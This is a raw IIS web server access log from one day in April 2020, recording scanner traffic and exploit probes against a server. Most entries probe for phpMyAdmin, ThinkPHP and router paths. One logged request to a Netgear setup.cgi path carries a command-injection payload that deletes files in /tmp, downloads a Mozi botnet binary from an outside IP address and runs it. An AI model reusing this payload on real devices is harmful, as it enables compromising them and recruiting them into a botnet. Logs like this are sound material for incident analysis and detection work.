#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 00:11:54 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 00:11:54 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 64 328 2020-04-08 00:11:59 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 64 984 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 02:04:03 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 02:04:03 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 250 2020-04-08 02:10:29 192.168.0.14 GET /phpMyAdmin/scripts/setup.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 404 0 2 265 2020-04-08 02:10:29 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 281 2020-04-08 02:10:30 192.168.0.14 GET /horde/imp/test.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 404 0 2 249 2020-04-08 02:10:30 192.168.0.14 GET /login from=0.000000 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 404 0 2 281 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 02:56:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 02:56:09 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 468 2020-04-08 03:04:46 192.168.0.14 GET /phpMyAdmin/scripts/setup.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 404 0 2 296 2020-04-08 03:04:46 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 281 2020-04-08 03:04:47 192.168.0.14 GET /horde/imp/test.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 404 0 2 281 2020-04-08 03:04:47 192.168.0.14 GET /login from=0.000000 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 404 0 2 312 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 03:52:05 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 03:52:05 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 328 2020-04-08 03:55:44 192.168.0.14 GET /TP/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 406 2020-04-08 03:55:44 192.168.0.14 GET /TP/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 421 2020-04-08 03:55:47 192.168.0.14 GET /thinkphp/html/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 2625 2020-04-08 03:55:50 192.168.0.14 GET /html/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 1691 2020-04-08 03:55:54 192.168.0.14 GET /public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 64 5000 2020-04-08 03:55:57 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 200 0 0 421 2020-04-08 03:57:37 192.168.0.14 POST /GponForm/diag_Form images/ 80 - 192.168.0.1 Hello,+World - 404 0 2 296 2020-04-08 04:10:29 192.168.0.14 GET /hudson - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 265 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 04:35:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 04:35:23 192.168.0.14 GET / - 80 - 192.168.0.1 HTTP+Banner+Detection+(https://security.ipip.net) - 200 0 0 343 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 05:13:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 05:13:02 192.168.0.14 GET /phpmyadmin/scripts/setup.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.162+Safari/537.36 - 404 0 2 250 2020-04-08 05:13:30 192.168.0.14 GET /scripts/setup.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.162+Safari/537.36 - 404 0 2 140 2020-04-08 05:13:57 192.168.0.14 GET /db/scripts/setup.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.162+Safari/537.36 - 404 0 2 156 2020-04-08 05:14:25 192.168.0.14 GET /admin/scripts/setup.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.162+Safari/537.36 - 404 0 2 140 2020-04-08 05:14:53 192.168.0.14 GET /myadmin/scripts/setup.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.162+Safari/537.36 - 404 0 2 140 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 08:38:03 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 08:38:03 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 200 0 0 485 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 09:42:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 09:42:23 192.168.0.14 GET /phpMyAdmin/scripts/setup.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 404 0 2 484 2020-04-08 09:42:26 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 2641 2020-04-08 09:42:28 192.168.0.14 GET /horde/imp/test.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 404 0 2 421 2020-04-08 09:42:28 192.168.0.14 GET /login from=0.000000 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 404 0 2 406 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 10:37:37 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 10:37:37 192.168.0.14 HEAD / - 80 - 192.168.0.1 - - 200 0 0 781 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 13:28:33 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 13:28:33 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 64 484 2020-04-08 13:28:45 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 1236 10077 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 14:26:28 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 14:26:28 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 453 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 14:44:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 14:44:23 192.168.0.14 GET /setup.cgi next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://202.111.130.184:42513/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 80 - 192.168.0.1 - - 404 0 2 453 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 15:09:52 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 15:09:52 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - 200 0 0 375 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 15:43:57 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 15:43:57 192.168.0.14 GET /portal/redlion - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 453 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 17:04:32 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 17:04:32 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 250 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 20:35:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 20:35:01 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 64 969 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 21:21:28 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 21:21:28 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 1236 13657 2020-04-08 21:32:21 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/66.0.3359.117+Safari/537.36 - 200 0 0 156 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2020-04-08 22:47:00 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2020-04-08 22:47:00 192.168.0.14 POST /cgi-bin/mainfunction.cgi - 80 - 192.168.0.1 XTC+BOTNET - 404 0 64 390